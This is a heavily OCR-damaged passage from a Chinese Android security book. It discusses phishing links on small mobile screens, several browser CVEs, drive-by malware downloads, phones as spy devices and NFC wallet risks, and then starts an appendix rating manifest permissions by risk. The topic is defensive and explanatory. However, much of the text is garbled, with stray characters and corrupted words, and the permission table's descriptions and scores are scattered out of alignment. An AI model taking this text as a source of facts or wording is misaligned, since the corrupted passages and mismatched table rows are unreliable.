码 的 URL 链接。 只 要 点 击 这 个 链接 地 址 ， 用 户 就 会 进入 一 个 网 站 ,该 网 站 看 起 来 
同 银行 网 站 非常 地 相似 。 于 是 ， 用 户 会 不 加 怀疑 地 完成 密码 重 置 操作 。 然 而 ， 结 果 
却 将 其 当前 的 密码 提供 给 了 攻击 者 。 

对 于 用 户 来 说 ， 在 移动 设备 上 识别 这 样 的 攻击 显得 更 加 困难 。 因 为 移动 设备 上 
的 UI 显示 布局 较 小 ， 用 户 不 能 认真 地 阅读 所 示 的 完整 URL 链接 信息 。 如 果 这 些 链 
接 重 定 回 到 茶 个 网 站 ， 那 么 在 移动 设备 上， 用 户 将 很 难 从 这 些 URL 链接 信息 上 识 
别 出 来 。 在 移动 设备 上 ， 较 小 的 UI 屏幕 布局 显示 使 用 户 很 难 分 辨 合法 网 站 和 假冒 
网 站 之 间 的 区 别 。 如 果 URL 经 过 伪装 (例如 ， 将 链接 地 址 以 特别 小 的 URL 形式 显 
示 ) 或 是 将 URL 隐藏 在 接收 的 短信 里 忆 通 过 在 短信 中 包含 极 小 的 URL) ， 那 么 合 
法 网 站 和 假冒 网 站 的 区 分 就 会 变 得 更 加 困难 。 很 多 用 户 (甚至 是 对 这 种 攻击 有 一 
定 了 解 的 用 户 ) 有 被 这 类 攻击 诱骗 的 经 历 。 正 如 在 前 一 章 所 提 到 的 ，QR (Quick 
Response, RIES) 码 也 可 以 被 用 来 实施 这 类 攻击 。 


10.2 移动 浏览 颖 安全 


本 节 将 回顾 近期 Android 平台 上 的 浏览 器 漏洞 ， 以 及 隐 项 强迫 下 载 式 攻击 
问题 。 
10.2.1 浏览 器 漏洞 

到 未 章 编写 时 为 止 ， 已 经 有 大 约 200 多 个 与 Android 平台 相关 的 常见 漏洞 和 暴 
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露 问 题 (Common Vulnerabilities and Exposures, CVE) 被 收录 到 了 CVE 的 数据 库 中 
(用 户 可 在 cve. mitre. org 网 站 上 搜索 关键 词 “android” 查 看 这 些 漏 洞 ) 。 这 些 CVE 
很 多 都 是 与 浏览 器 相关 的 漏洞 ， 包 括 系统 内 置 的 浏览 器 ， 以 及 网 络 上 可 供 下 载 的 浏 
Viu. PUKI (Firefox) 浏览 希 。 表 10. 2 主要 介绍 了 下 述 几 种 CVE 及 其 相应 的 
说 明 (详细 说 明 请 参考 NIST 网 站 介绍 2):，CVE 2008-7298, CVE 2010-1807, CVE 
2010-4804, CVE 2011-2357 和 CVE 2012-3979, 


CVE 2008-7298 


CVE 2010-1807 


CVE 2010-4804 


CVE 2011-2357 


CVE 2012-3979 


3& 10.2 Android 设备 上 与 浏览 器 有 关 的 漏洞 示例 旺 
说 明 
Android 系统 内 置 的 Android 浏览 器 无 法 恰当 地 限制 HTTPS 会 话 中 cookies 被 算 改 的 
行为 ， 导 致 攻击 者 能 够 通过 中 间 人 攻击 ， 利 用 HTTP 啊 应 报 文 的 Set- Cookie 头 部 字 


段 ， 重 写 或 删除 任意 的 cookies 信息 。 该 漏洞 的 产生 由 于 没有 使 用 强制 安全 传输 技术 
( Http Strict Transport Security, HSTS) 


该 漏洞 存在 于 苹果 公司 的 4. 1. 2 版 本 之 前 的 4. x 系列 版 本 和 5.0.2 版 本 之 前 的 5.x 
系列 版 本 的 Safari 浏览 器 中 ，Google 公司 的 Android 2. 2 版 本 之 前 的 Android 系统 ， 以 
及 1.2.6 版 本 之 前 的 webkitgtk 模块 中 。 该 漏洞 导致 无 法 正确 地 对 浮 点 数据 进行 验证 ， 
使 得 远程 攻击 者 能 够 执行 任意 代码 ， 或 是 借助 专门 编写 的 HTML 文档 制造 拒绝 服务 
(应 用 程序 骨 当 ) 攻击 ， 这 些 问题 都 与 没有 使 用 标准 的 NaN 表示 法 有 关 


远程 攻击 者 能 够 借助 Android 2. 3. 4 版 本 之 前 的 Android 系统 内 置 的 浏览 器 com/ 
android/ browser/ Tt 4$ F HJ BrowserActivity. java 和 BrowserSettings. java 文件 ， 使 用 特定 
的 语句 “content， //URI" $jl& SD 卡 内 的 文件 


在 Android 2. 3. 4 和 Android 3. 1 版 本 的 浏览 器 URL 加 载 功能 中 存在 跨 应 用 程序 脚本 
漏洞 ， 该 漏洞 能 够 使 本 地 应 用 程序 绕 过 沙 箱 机 制 ， 在 任意 操作 域 (Domain) 中 执行 
任意 的 JavaScript 脚本 。 攻 击 者 利用 该 漏洞 的 方式 有 两 种 : (DMAX. TAB 参数 设置 了 
浏览 器 可 以 同时 打开 的 最 多 标签 数 ， 使 用 浏览 器 一 次 性 同时 打开 所 有 的 标签 ， 然 后 
将 指向 特定 目标 域 的 URI 加 载 到 当前 标签 页 的 地 址 栏 内 。@ 同 时 调用 两 次 startActivity 
函数 ， 先 是 使 用 了 目标 域 的 URI， 随 即 又 使 用 了 恶意 JavaScript 脚本 ， 而 将 焦点 仍 放 
置 在 启动 的 目标 域 的 Activity 上 


15. 0 版 本 之 前 的 Android 火狐 浏览 器 没有 正确 地 调用 _ android_log_print 函数 ， 在 
浏览 器 程序 中 存在 远程 控制 代码 执行 漏洞 ， 致 使 攻击 者 能 够 在 远 端 通过 利用 Java 
Script 转 储 函数 的 特制 网 页 ， 在 受 影响 的 应 用 程序 中 利用 此 漏洞 执行 任意 的 代码 


CVE 2008-7298 漏洞 可 以 被 攻击 者 用 来 自 改 或 删除 cookies; CVE 2010-1807 ihi 
洞 可 以 被 攻击 者 用 来 执行 任意 代码 或 造成 应 用 程序 崩溃 ; CVE 2010-4804 漏洞 可 以 


C) NIST (National Institute of Standards and Technology， 美 国 国家 标准 与 技术 研究 院 )，NIST 有 关 CVE 的 
说 明 参 见 网 站 http; //web. nvd. nist. gov/view/vuln/detail? vulnld =CVE。 一 一 原 书 注 

C 表格 内 容 源 于 网 站 http: //web. nyd. nist. gov/view/vuln/detail? Vulnld = CVE, 漏洞 说 明 来 自 国家 漏洞 
数据 库 (National Vulnerability Database, NVD), 一 一 原 书 注 
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导致 SD 卡 上 存储 的 信息 泄露 ; CVE 2011-2357 漏洞 能 够 导致 XSS 攻击 ; CVE 2012- 
3979 漏洞 能 够 导致 特定 代码 被 执行 。 和 普通 计算 机 的 浏览 器 汤 洞 相 比 , -可 以 发 现 
移动 浏览 句 的 漏洞 和 普通 计算 机 浏览 器 的 漏洞 具有 相同 的 特点 。 通 常 ， 如 果 移 动 应 
用 程序 的 开发 没有 按照 既定 的 安全 开发 周期 (Security Development Lifecycle, SDL) 
的 流程 进行 。 而 且 ， 如 果 开 发 者 错误 地 认为 SDL 流程 可 有 可 无 或 同 移动 应 用 程序 
的 开发 关系 不 大 ， 就 会 导致 程序 开发 人 员 在 开发 过 程 中 忽略 很 多 安全 控制 手段 
(例如 ， 威 胁 建 模 、 静 态 分 析 和 动态 分 析 、 渗 透 测试 ， 以 及 代码 审查 等 ) ， 从 而 使 
它们 没有 被 应 用 在 移动 应 用 程序 的 开发 过 程 中 。 

隐 菩 强迫 下 载 ” 

对 于 普通 计算 机 来 说 ， 隐 蔽 强迫 下 载 的 问题 已 经 存在 了 很 长 时 间 了 。 然 而 ， 如 
今 这 类 问题 已 经 开始 出 现在 移动 设备 上 ， 成 为 一 种 新 兴 的 移动 设备 安全 威胁 方式 。 
基本 上 ， 隐蔽 强迫 下 载 的 软件 部 是 一 些 恶 意 软 件 。 当 用 户 访 问 受 感 染 的 网 站 时 ， 这 
些 软件 会 在 后 台 目 动 下载 ， 并 且 通 常会 自行 安装 。 

最 近 ， 本 书 作 者 看 到 了 第 一 个 Android 系统 上 的 隐蔽 强迫 下 载 的 恶意 软件 〈 这 
款 恶 意 软 件 的 名 字 是 “NonCompatible”) 。 当 访问 受 感染 的 网 站 时 ,浏览 器 会 自行 
下 载 这 款 恶 意 软 件 。 但 是 ， 如 果 没 有 用 户 的 操作 配合 ， 下 载 的 这 款 软 件 是 不 能 自行 
安装 的 。 而 且 ， 安 装 从 不 可 徘 来 源 获 得 的 软件 ， 首 先 需要 用 户 开 局“ 允许 安装 其 
他 源 软件 ”设置 ， 然 后 得 到 用 户 的 安装 许可 ， 才 能 将 软件 安装 在 系统 上 。 所 以 攻 
击 者 通 稼 对 这 类 软件 的 下 载 进 行 伪 闻 ， 将 其 命名 为 某 个 流行 的 Android 应 用 程序 或 
Android 系统 的 更 新 。 用 户 往 往 出 于 主动 意愿 下 载 并 安 淡 这 类 文件 ， 而 在 这 个 过 程 
中 并 没有 过 多 地 考虑 安全 问题 ， 因 此 导致 用 户 的 设备 被 恶意 软件 感染 。 

不 过 ， 只 要 禁用 Side-loading 应 用 程序 安装 方式 ， 以 及 取消 安装 来 自 不 可 靠 源 
的 应 用 程序 的 功能 设置 ，Android 设备 就 基本 不 会 遭受 到 这 类 恶意 软件 的 影响 了 。 


10.3 未 来 移动 设备 威胁 发 展 格局 


到 此 ， 本 章 已 经 介绍 了 各 种 被 广泛 利用 的 漏洞 ， 以 及 在 今天 仍然 能 够 被 利用 的 
漏洞 。 本 节 将 主要 讨论 在 不 入 的 将 来 Android 设备 上 可 能 出 现 的 各 种 新 的 攻击 形 
式 。 不 过 ， 需 要 注意 的 是 ， 对 于 这 些 新 的 攻击 形式 ， 非 专业 人 员 将 无 法 实施 ， 只 有 
有 组 织 的 犯罪 集团 、 国 家 和 情报 机 构 通过 完善 的 计划 、 可 靠 的 执行 ， 以 及 充分 的 资 
源 配 置 供给 ， 才 能 实施 这 些 攻击 。 虽 然 本 节 所 讲 的 这 些 新 型 的 攻击 形式 看 似 仅 可 能 


O ”隐蔽 强迫 下 载 (Drive-by Downloads) ， 即 应 用 软件 隐藏 在 网 页 中 ， 用 户 在 浏览 网 页 时 会 在 不 知情 的 情 
况 下 ， 上 自动 下 载 安 装 间谍 软件 等 恶意 程序 。 一 一 原 书 注 

© Side-loading， 指 在 Android 设备 上 直接 使 用 APK 格式 的 应 用 程序 文件 安装 应 用 程序 ， 这 些 APK 格式 
的 应 用 程序 文件 通常 从 其 他 网 站 上 获得 ， 而 不 是 从 Google Play 商店 下 载 。 一 一 译 者 注 
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出 现在 遥远 的 将 来 ， 但 在 如 今 的 现实 生活 中 ,它们 也 是 有 可 能 发 生 的 ， 其 至 不 久 以 
后 ， 这 类 攻击 形式 发 生 的 可 能 性 会 更 大 。 在 本 市 中 ， 主 要 列举 了 下 述 几 种 威胁 信息 
安全 的 攻击 形式 : 将 手机 用 作 间 谍 / 跟 踪 设 备 、 通 过 移动 设备 操纵 企业 网 络 和 其 他 
设备 ， 以 及 利用 移动 设备 近 场 通信 (Near Field Communication, NFC) 的 功能 。 


10. 3.1 手机 变 身 间谍 / 跟 中 装置 


设想 一 下 ， 利 用 Android 设备 或 应 用 程序 上 的 漏洞 ， 实 现 对 移动 电话 的 完全 操 
f. root 处 理 后 的 Android 移动 电话 最 容易 受到 这 类 攻击 ， 将 移动 电话 变 成 跟踪 和 
间谍 装置 。 请 考虑 一 下 ， 移 动 电话 上 可 能 被 攻击 者 利用 的 功能 有 : 照相 机 和 照片 、 
GPS we — 电子 邮件 、 聊 天 信息 、 社 交 媒 体 信息 (餐馆 位 置 、 名 胜 古 
迹 ) 、 县 〈 例 如 ， 去 过 的 医院 或 诊所 、 查 找 或 看 过 的 医生 ) ， 以 及 通过 设备 
pr 

智能 手机 可 以 作为 最 好 的 跟踪 /间谍 设备 ， 因 为 它 可 以 提供 用 户 和 其 身边 大 们 目 
常 工作 生活 中 的 每 一 件 细小 的 信息 ， 从 而 实现 收集 信息 的 目的 。 没有 意识 到 这 类 和 危害 
的 用 户 ， 会 像 往常 一 样 很 自然 地 随身 携带 他 们 的 智能 手机 。 同 样 ， 将 手机 用 作 跟 蹊 / 
间谍 装置 的 恶意 用 户 也 是 如 此 ， 以 便 时 刻 窃取 跟踪 目标 的 信息 。 对 于 有 组 织 的 犯罪 、 
Ej ZUR 恐怖 分 子 ， 以 及 执法 机 构 来 说 ， 智 能 手机 是 非常 适合 的 跟踪 /间谍 设备 。 监 于 
人 们 会 使 用 这 些 智能 移动 设备 完成 各 种 事务 ， 所 以 这 些 设备 同样 也 成 为 了 重要 的 执 
法 工具 (例如 ， 通 过 检查 这 些 设备 收集 使 用 者 的 犯罪 证 据 )。 所 有 的 这 一 切 都 应 当 
引起 一 般 用 户 的 注意 ， 从 而 尽量 提升 对 智能 手机 的 安全 和 隐私 问题 的 重视 程度 。 


10. 3.2 通过 移动 设备 操纵 企业 网 络 与 设备 


移动 应 用 程序 或 Android 平台 本 身 的 漏洞 ， 还 会 导致 一 些 其 他 安全 问题 的 出 
现 。 除 了 作为 刺探 企业 的 间谍 工具 外 ， 攻 击 者 还 可 以 使 用 智能 设备 发 起 各 种 针对 企 
业 资 源 的 攻击 ,乃至 控制 企业 的 信息 系统 。 

如 第 9 章 介绍 的 情况 ， 实 际 上 企业 并 没有 对 企业 购买 的 和 用 户 自 带 的 /Android 
设备 进行 管控 。 大 多 数 公司 没有 规定 将 这 些 设 备 的 使 用 限定 在 特定 的 范围 或 区 域 。 
并 且 ， 自 带 设 备 (Bring Your Own Device, BYOD) 上 的 应 用 程序 和 系统 平台 ERI RS 
洞 修补 也 不 是 企业 安全 管理 人 员 需 要 实施 管控 的 工作 范畴 。 所 有 的 这 一 切 导 致 企业 
环境 中 的 资源 信息 存在 着 严重 的 安全 隐患 。 事 实 上 ， 这 些 设备 超出 了 一 般 的 安全 时 
控 措 施 〈 例 如 ， 安 全 扫描 、 漏 洞 修补 、 应 急 响 应 2 ) 的 监管 范围 ， 因 而 增加 了 安全 


O WE (Incident Response, TR), ， 也 称 事件 响应 ， 企业 信息 化 管理 范畴 概念 。 通常 是 指 企业 安全 
大 员 在 遇 到 突 发 事件 后 所 采取 的 措施 和 行动 。 对 网 络 来 说 ,“ 突 发 事件 ” 是 指 影响 一 个 系统 正常 工作 
的 情况 ， 这 里 的 系统 包括 主机 范畴 内 的 问题 ， 也 包括 网 络 范畴 内 的 问题 ， 这 种 “情况 包括 常见 的 
轴 客 人 侵 、 信 息 窍 取 等 ， 也 包括 拒绝 服务 攻击 、 网 
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风险 。root 处 理 后 的 设备 不 仅 使 用 户 有 可 能 遭受 到 安全 攻击 ， 还 会 将 用 户 所 处 的 环 
境 暴露 在 各 种 安全 攻击 之 下 。 随 着 Android 系统 上 各 种 应 用 程序 的 出 现 (例如 ， 
Wireshark 软件 ) ， 编 写 特 定 的 应 用 程序 发 起 安全 攻击 ， 在 现实 生活 中 是 很 有 可 能 发 
生 的 。 可 以 想象 ,安全 人 员 在 其 所 处 环境 中 处 理 这 些 设备 和 问题 时 可 能 面临 的 各 种 
琼 手 局 面 。 换 一 种 场景 来 说 ， 越 来 越 多 的 家 电 用 品 和 系统 可 以 通过 移动 设备 来 控 
制 。 因 此 ， 攻 击 者 很 容易 利用 这 些 存 在 漏洞 或 易 被 攻击 的 Android 设备 对 这 些 家 电 
产品 和 设备 发 起 各 种 攻击 。 


10. 3.3 移动 钱包 与 NFC 


本 书 在 第 7 章 已 经 简要 地 介绍 了 NFC 技术 ， 并 且 讨 论 了 Coogle 钱包 (Google 
Wallet) 存在 的 漏洞 。 逐 渐 地 ， 越 来 越 多 的 零售 商 和 银行 开始 着 眼 于 将 NFC 技术 用 
于 移动 支付 业务 。 虽 然 这 种 尝试 还 处 于 起 步 阶 段 ， 但 人 们 对 将 NFC 用 于 移动 钱包 
功能 可 能 存在 的 隐私 和 安全 问题 的 担忧 也 随 之 出 现 。 除 了 对 围绕 NFC 应 用 程序 安 
全 性 的 担忧 外 ，NEC 技术 还 存在 一 些 其 他 的 安全 问题 ， 例 如 穷 听 、 拦 截 和 丧失 控 
制 。 从 本 质 上 来 说 ，NFC 是 一 种 无 线 通信 技术 。 因此， 在 NFC 信号 覆盖 范围 内 窃 
听 通 信 并 非 没 有 可 能 。 同 射频 识别 (Radio- Frequency Identification, RFID) 技术 相 
HE, NFC 技术 对 通信 的 覆盖 范围 进行 了 限制 ， 尽 管 可 以 使 用 天 线 对 信号 进行 放大 ， 
延伸 其 通信 和 范围。 假设 通信 安全 得 到 保障 ( 如 对 通信 数据 实施 加 密 )， 但 攻击 者 仍 
然 可 以 利用 相关 数据 包 分 析 工 具 ， 对 NFC 通信 中 传输 的 数据 进行 分 析 。 另 一 个 问 
题 是 ， 如 果 和 手机 丢失 或 被 盗 ， 用户 的 银行 信息 和 信用 卡 信息 (还 包括 公司 的 企业 
卡 信息 ) 很 可 能 会 面临 风险 。 虽 然 用 户 可 能 很 想 使 用 这 些 基 于 NFC 技术 的 功能 ， 
但 通常 用 户 可 能 并 不 了 解 基 于 该 技术 的 各 项 功能 存在 的 风险 ， 而 且 用 户 往往 也 不 愿 
意 遵从 最 佳 的 安全 操作 方法 ， 从 而 为 移动 设备 信息 安全 埋 下 隐患 。 

NFC 技术 不 仅 可 以 用 在 移动 支付 上 ， 还 可 以 用 于 短 距 离 信息 快捷 传输 。 近 期 ， 
三 星 公 司 发 布 了 一 款 Galaxy SIH 智能 手机 ， 使 用 NFC 作为 信息 传输 技术 ， 实 现 设 备 
间 信 息 内 容 的 无 颖 传输 。 用 户 只 需 将 两 部 设备 背 对 背 接触 ， 即 可 实现 设备 间 信 息 内 
容 的 无 缝 便捷 传输 。 虽 然 该 功能 拥有 相当 优秀 的 用 户 体验 ， 但 却 存 在 一 定 的 安全 隐 
患 。 例 如 ， 数 据 安全 等 问题 。 设 想 一 下 ， 利 用 这 一 功能 ,数据 有 可 能 直接 被 传输 到 
安全 管理 员 管控 之 外 的 设备 上 ， 造 成 信息 泄露 。 


10.4 小结 
本 章 主要 讨论 了 移动 HTML 的 安全 问题 和 WAP 的 安全 问题 ， 介 绍 了 移动 网 站 


上 可 能 发 生 的 一 些 典型 的 安全 攻击 。 简 要 地 分 析 了 部 分 浏览 器 漏洞 和 隐蔽 强迫 下 载 
的 问题 。 最 后 ， 介 绍 了 几 种 基于 移动 设备 的 高 级 别 安全 攻击 形式 。 


附 — ox 


附录 A Manifest 权限 


在 第 4 章 ， 我 们 已 经 讨论 了 Manifest 权限 。 应 用 程序 请 求 这 些 权 限 用 于 执行 请 
如 互联 网 访问 、 发 送 SMS 信息 等 特定 的 操作 。 我 们 根据 安全 风险 的 程度 对 这 些 权 
限 做 出 了 评级 。 发 送 SMS 短信 息 或 安装 软件 包 的 权限 ,在 安全 风险 的 程度 (严重 
性 ) 上 高 于 访问 电池 使 用 量 统计 数据 的 权限 。 下 表 展 示 了 针对 不 同 严 重 性 /风险 等 
级 设 定 的 分 值 。 


^] -得 描述 /风险 
- 严重 风险 等 级 
3 高 风险 等 级 
2 中 等 风险 等 级 
l 信息 披露 等 级 


表 A. 1 列 出 了 所 有 的 Manifest 权限 ， 对 应 的 说 明 ， 以 及 相应 的 风险 等 级 。 
表 A.1 Manifest 权限 


权限 名 称 说 明 介 绍 风险 等 级 
ACCESS_CHECKIN_PROPERTIES TLF Wegen (12) VULNUS D 2 
"properties (属性 ) ” 表 ， 更 新 属性 值 
允许 应 用 程序 通过 基站 、Wi- Fi 等 网 络 位 置 源 
获取 粗略 的 位 置信 息 
允许 应 用 程序 通过 GPS， 基 站 和 Wi-Fi 等 位 置 
源 获 取 精 确 的 位 置信 息 
ACCESS. LOCATION. EXTRA. COMMANDS | 允许 应 用 程序 访问 额 外 的 位 置 提供 者 《Tocation 2 
Provider) 指令 
允许 应 用 程序 创建 模拟 位 置 提供 者 ( Location 


ACCESS_MOCK_LOCATION l 
Provider) 进行 测试 


ACCESS NETWORK. STATE 允许 应 用 程序 访问 网 络 状 态 信息 l 
省 应 


nger 
ACCESS SURFACE. FLINGER Bi 用 程序 使 用 SurfaceFlinger ^? fJ JST 1 
IL 


C) SurfaceFlinger, Android 平台 上 底层 的 图 形 显示 支持 ， 一 般 用 于 游戏 或 照相 机 预览 界面 和 底层 模式 的 
屏幕 截图 。 一 一 译 者 注 






ACCESS_COARSE_LOCATION 






ACCESS_FINE_LOCATION 





158 


权限 名 称 
ACCESS. WIFI. STATE 


ACCOUNT MANAGER 


ADD VOICEMAIL 


AUTHENTICATE. ACCOUNTS 


BATTERY STATS 


BIND. ACCESSIBILITY. SERVICE 


BIND. APPWIDGET 


BIND DEVICE ADMIN 


BIND INPUT METHOD 


BIND REMOTEVIEWS 


BIND TEXT SERVICE 


BIND VPN SERVICE 


BIND WALLPAPER 


BLUETOOTH 
BLUETOOTH, ADMIN 
BRICK 


BROADCAST PACKAGE REMOVED 


BROADCAST SMS 


BROADCAST STICKY 


©  AccountAuthenticator, IKA SADIRI, HITIK JS uE[a RR, EEH Gmail 账户 信息 ， 只 有 系统 
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说 明 介 绍 风险 等 级 





允许 应 用 程序 访问 Wi-Fi 网 络 状 态 信息 

人 允许 应 用 程序 调用 账户 身份 验证 器 (Account 
Authenticator@ ) 

允许 应 用 程序 向 系统 申请 发 送 语音 邮件 


允许 应 用 程序 承担 账户 身份 验证 器 功能 ， 进 行 
账户 管理 


允许 应 用 程序 收集 电池 电量 统计 信息 


该 权限 只 限 AccessibilityService 服务 申请 ， 以 确 
保 只 有 系统 才能 与 之 绑 定 


允许 应 用 程序 告诉 appWidget 服务 (Service) 
哪 一 个 应 用 程序 能 够 访问 appWidget (小 插件 ) 
的 数据 


该 权限 只 限 设备 管理 员 Receiver 请 求 ， 以 确保 
只 有 系统 才能 与 其 交互 

只 限 InputMethodService 服务 请 求 ， 以 确保 只 有 
系统 才能 同 它 绑 定 

只 限 RemoteViewsService 服务 请 求 ， 以 确保 只 有 
系统 才能 同 它 绑 定 

只 限 TextService 服务 请 求 

APR VpnService 服务 请 求 ， 以 确保 只 有 系统 才 











只 限 WallpaperService 服务 请 求 ， 以 确保 只 有 系 


统 才 能 同 它 绑 定 


允许 应 用 程序 连接 配对 完成 的 蓝牙 设备 
允许 程序 进行 发 现 新 的 蓝牙 设备 并 与 之 配对 
用 于 请 求 禁用 设备 〈 非 常 危险 !) 


允许 应 用 程序 广播 软件 已 被 卸载 的 事件 通知 
( Notification ) 

允许 应 用 程序 广播 收 到 SMS 短信 息 的 事件 通知 

人 允许 应 用 程序 广播 与 Intent 相连 的 消息 ( Sticky 


Intent) 


级 进程 才能 访问 的 权限 。 一 一 译 者 注 


( 续 ) 


权限 名 称 


BROADCAST_WAP_PUSH 


CALL PHONE 


CALL PRIVILEGED 


CAMERA 


CHANGE COMPONENT 


-STATE 


CHANGE_CONFIGURATION 
CHANGE_NETWORK_STATE 


CHANGE WIFI MULTICAST STATE 


CHANGE WIFI STATE 


CLEAR APP CACHE 


CLEAR. APP USER. DATA 


CONTROL. LOCATION. UPDATES 


DELETE CACHE FILES 
DELETE PACKAGES 
DEVICE POWER 
DIAGNOSTIC 

DISABLE KEYGUARD 


DUMP 


EXPAND STATUS BAR 


FACTORY TEST 


FLASHLIGHT 


FORCE BACK 


GET ACCOUNTS 


F 
D 


vi 8j] 4r 8 
允许 应 用 程序 广播 收 到 WAP PUSH 服务 的 事件 
通知 
允许 应 用 程序 绕 过 系统 提供 的 用 户 拨 号 界面 进 
行 拨号 呼叫 ， 无 需 用 户 的 确认 


允许 应 用 程序 绕 过 系统 提供 的 用 户 拨号 界面 呼 
叫 任意 电话 号 码 ， 包 括 紧急 电话 ， 无 需 用 户 确认 


用 于 请 求 访 问 照相 机 设备 
允许 应 用 程序 更 改 其 他 应 用 程序 组 件 的 启用 





允许 应 用 程序 修改 当前 配置 ， 如 地 区 位 置 
允许 应 用 程序 改变 网 络 连接 状态 
允许 应 用 程序 启动 Wi- Fi 多 播 模式 (Multicast 


[EF 


允许 应 用 程序 更 改 Wi- Fi 连接 状态 
允许 应 用 程序 清除 设备 上 所 有 安装 的 应 用 程序 


允许 应 用 程序 清除 应 用 软件 的 用 户 数据 
允许 启用 /禁用 来 自 无 线 模块 的 位 置 更 新 通知 
( Notification ) 

允许 应 用 程序 删除 缓存 文件 

允许 应 用 程序 印 载 软件 包 

允许 访问 底层 电源 管理 

允许 应 用 程序 读 写 诊断 资源 

允许 应 用 程序 禁用 键盘 锁 (keyguard) 

允许 应 用 程序 从 系统 服务 (Service) 提取 状态 


一 


H 
允许 应 用 程序 展开 或 收缩 状态 栏 


设备 厂商 提供 的 设备 测试 程序 ， 只 有 超级 用 户 
(root) 才能 运行 

允许 访问 闪光 灯 | 
允许 应 用 程序 强制 系统 执行 BACK 操作 ， 无 论 
其 Activity 是 否 在 顶层 


允许 应 用 程序 获取 账户 服务 (Accounts Service) 
维护 的 账户 列表 


S 
NA 
2 


x 
X 
导 | 全 
E 
mF 
cu 
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权限 名 称 


GET PACKAGE SIZE 


GET TASKS 


GLOBAL SEARCH 


HARDWARE TEST 


INJECT EVENTS 


INSTALL LOCATION PROVIDER 


INSTALL PACKAGES 


INTERNAL SYSTEM WINDOW 


INTERNET 


KILL BACKGROUND PROCESSES 


MANAGE ACCOUNTS 


MANAGE APP TOKENS 


MASTER, CLEAR 
MODIFY, AUDIO. SETTINGS 
MODIFY PHONE STATE 

MOUNT. FORMAT FILESYSTEMS 
MOUNT UNMOUNT FILESYSTEMS 
NFC 


PERSISTENT ACTIVITY 


PROCESS OUTGOING. CALLS 
READ CALENDAR 


Android 系统 安全 与 攻防 


说 明 介 绍 


允许 应 用 程序 获取 系统 中 任意 程序 占用 的 存储 
空间 大 小 


允许 应 用 程序 获取 当前 或 近期 运行 任务 的 信息 
人 允许 全 局 搜索 系统 访问 Content. Provider 提供 的 


请 


允许 访问 外 围 硬件 设备 ， 即 外 设 
允许 应 用 程序 将 用 户 事 件 〈 按 键 、 触 摸 、 轨 迹 


EK) 注入 到 事件 流 ， 然 后 将 这 些 用 户 事件 交付 给 
任意 的 窗口 





允许 应 用 程序 向 位 置 管理 器 (Location Manager) 
安装 自 定 义 的 位 置 提 供 者 (Location Provider) 


允许 应 用 程序 安装 其 他 应 用 软件 


允许 应 用 程序 打开 部 分 系统 用 户 界 面 使 用 的 
窗口 


允许 应 用 程序 开启 网 络 套 接 字 (Socket) 


允许 应 用 程序 调用 killBackgroundProcesses( ) g 
数 杀 死 后 台 进 程 


| | 


允许 应 用 程序 管理 账户 管理 器 ( AccountManager ) 
维护 的 账户 列表 


允许 应 用 程序 管理 (创建 mie, ZF) 窗口 
管理 器 (Window Manager) 内 的 应 用 程序 标号 


( Token) 





人 允许 应 用 程序 更 改 系统 全 局 音频 设置 





该 权限 在 级 别 9 的 Android API 中 停止 使 用 ， 并 
且 这 一 功能 将 在 以 后 的 Android API 中 删除 ， 建 议 
用 户 不 要 使 用 。 人 允许 应 用 程序 保持 其 Activity 持久 







人 允许 应 用 程序 监控 、 更 改 或 放弃 电话 呼叫 
允许 应 用 程序 读 取 用 户 日 程 数据 


权限 名 称 
READ CALL LOG 
READ CONTACTS 
READ EXTERNAL STORAGE 
READ FRAME BUFFER 


READ HISTORY BOOKMARKS 


READ INPUT STATE 


READ LOGS 

READ PHONE STATE 
READ PROFILE 

READ SMS 

READ. SOCIAL STREAM 
READ. SYNC SETTINGS 
READ SYNC STATS 

READ USER, DICTIONARY 
REBOOT 


RECEIVE BOOT COMPLETED 


RECEIVE MMS 


RECEIVE. SMS 


RECEIVE WAP PUSH 
RECORD AUDIO 


REORDER TASKS 


RESTART PACKAGES 


SEND SMS 


SET ACTIVITY WATCHER 


SET ALARM 


说 明 介 绍 
用 程序 读 取 用 户 呼叫 记录 
用 程序 读 取 用 户 联 系 人 资料 
允许 应 用 程序 从 外 部 存储 设备 中 读 取 数据 
许 应 用 程序 截屏 ， 通 常用 于 访问 帧 缓存 数据 
允许 应 用 程序 读 取 (但 不 更 改 ) 用 户 浏览 器 历 
史记 录 和 书签 
该 权限 在 级 别 16 的 Android API 中 停止 使 用 ， 
使 用 这 一 权限 的 API 已 被 删除 
允许 应 用 程序 读 取 底 层 系统 日 志文 件 
允许 只 读 访 问 电话 状态 
允许 应 用 程序 读 取 用 户 个 人 资料 数据 
许 应 用 程序 读 取 SMS 短信 息 
许 应 用 程序 从 用 户 社 交 平 台 上 读 取 数据 
允许 应 用 程序 读 取 同 步 设置 
许 应 用 程序 读 取 同 步 状 态 
允许 应 用 程序 读 取 用 户 词典 
用 于 请 求 设备 重启 


允许 应 用 程序 接收 系统 启动 完成 时 广播 的 
ACTION_BOOT_COMPLETED 事件 动作 


允许 
允许 


c? 
E 


N 
4 


一 
-二 
N >] N M“ U 2 UU US US 


c? 


c? 
E 


允许 应 用 程序 监听 MMS 信息 到 来 ， 记 录 或 对 其 


进行 处 理 

允许 应 用 程序 监听 SMS 短 消 息 到 来 ， 记 录 或 对 
其 进行 处 理 

允许 应 用 程序 监听 WAP 推送 (push) 信息 

允许 应 用 程序 录音 

允许 应 用 程序 改变 任务 的 先后 顺序 ， 也 就 是 任 
务 Z 序 (Z-order) 


该 权限 在 级 别 8 的 Android API 中 停止 使 用 ， 系 
统 不 再 支持 restartPackage( ) 函数 功能 

允许 应 用 程序 发 送 SMS 短信 息 

允许 应 用 查看 并 控制 Activity 在 系统 中 的 运行 
状态 

允许 应 用 程序 广播 一 个 Inten, BEAP iep 





| 


| 


] 
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权限 名 称 
SET ALWAYS FINISH 


SET ANIMATION SCALE 
SET DEBUG APP 


SET ORIENTATION 
SET POINTER, SPEED 


SET PREFERRED APPLICATIONS 


SET PROCESS LIMIT 


SET TIME 

SET TIME ZONE 

SET WALLPAPER 

SET WALLPAPER. HINTS 

SIGNAL PERSISTENT PROCESSES 


STATUS BAR 


SUBSCRIBED FEEDS READ 


SUBSCRIBED FEEDS WRITE 
SYSTEM ALERT. WINDOW 


UPDATE DEVICE STATS 
USE CREDENTIALS 


USE. SIP 
VIBRATE 


WAKE LOCK 


WRITE APN SETTINGS 
WRITE CALENDAR 


Android 系统 安全 与 攻防 


(Finish) 当前 Activity 





修改 全 局 动画 缩放 系数 


将 应 用 程序 设置 为 调试 模式 
